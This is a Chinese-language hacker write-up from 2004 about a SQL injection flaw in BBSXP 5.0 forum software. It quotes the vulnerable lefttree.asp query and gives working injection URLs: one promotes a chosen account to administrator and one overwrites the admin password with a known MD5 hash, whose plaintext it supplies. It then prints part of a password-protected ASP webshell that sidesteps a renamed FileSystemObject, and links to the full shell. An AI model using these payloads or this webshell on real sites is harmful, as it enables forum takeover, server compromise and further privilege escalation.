移型换位之BBSXP5.0论坛系统_安全中国_全球最大网络安全培训门户

===========================[ 移型换位之 BBSXP5.0 ]==================


          漏洞发现者:  xiaolu(web@666w.cn) 13K(13_k@163.com)
          所影响版本: BBSXP5.0 SQL/ACCESS
          日期:2004.5.1  WWW.666W.COM WWW.SHJSAFE.COM

==============[ 1. 前言 ]============================================

-_-"" 今天是5·1劳动节,好无聊吖..先祝大家大家劳动节快乐.....

太无聊了..在朋友一个论坛上灌水,朋友让我检测他论坛的安全.....

好吧,看了一下,是BBSXP5.0的.就去下载个来看看....

======================================[ 1. 内容 ]====================

看代码中..........

(没想到,有个这么**的问题,程序员们该反省反省了,写此篇文章,没什么技术可言,只是想提醒一下程序员们,不要太懒了 :P)

lefttree.asp

<%

if Request("menu")="menu" then

sql="Select * From menu where followid="&Request("id")&" order by SortNum"
Set Rs1=Conn.Execute(sql)
do while not rs1.eof

嘿嘿.看到了没? 是多么多么的无聊.........

=======================[ 1. 利用 ]===================================

OK.Let's go..
http://www.host.com/LeftTree.asp?menu=menu&id=1;update [user] set membercode=5 where username='fuck';--
http://www.host.net/LeftTree.asp?menu=menu&id=1;update clubconfig set adminpassword='A64D84237507262182B4B902A5EDC35B';--

OK.
user:fuck
pass:xiaoxue

"A64D84237507262182B4B902A5EDC35B"是32位的MD5加密.

进入后台..嘿嘿.搞个webshell吖..恩.传上去....吖!!!!! FSO被改名字了..555555

不好玩了..得想个办法解决它....OK.有了!

用object,挖哈哈.....搞定,搞定........

试了一下,他们没改clsid.只要clsid没改就能运行...代码如下:

<%@ LANGUAGE = VBScript.Encode  codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="fuckfuck" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>

<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>

<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
  <tr>
    <td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
  </tr>
  <tr>
    <td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
      <div align="center"><center><p>Enter Password：<input type="password" name="password"
      size="20"
      style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
      <input type="submit" value="OK!LOGIN" name="B1"
      style="font-size: 9pt; border: thin outset"></p>
      </center></div>
    </form>
    </td>
  </tr>
</table>
</body>
</html>
<%end if%>

省略了......

完整的代码下载地址为:http://soft.666w.com/tools/gif.rar

呵....解决问题,可以继续延伸了.......

=======================[ 1. 结束 ]===================================

可以利用这些拿到更高的权限,嘿嘿.. ACCESS版的,只可以拿到MD5加密后的Password..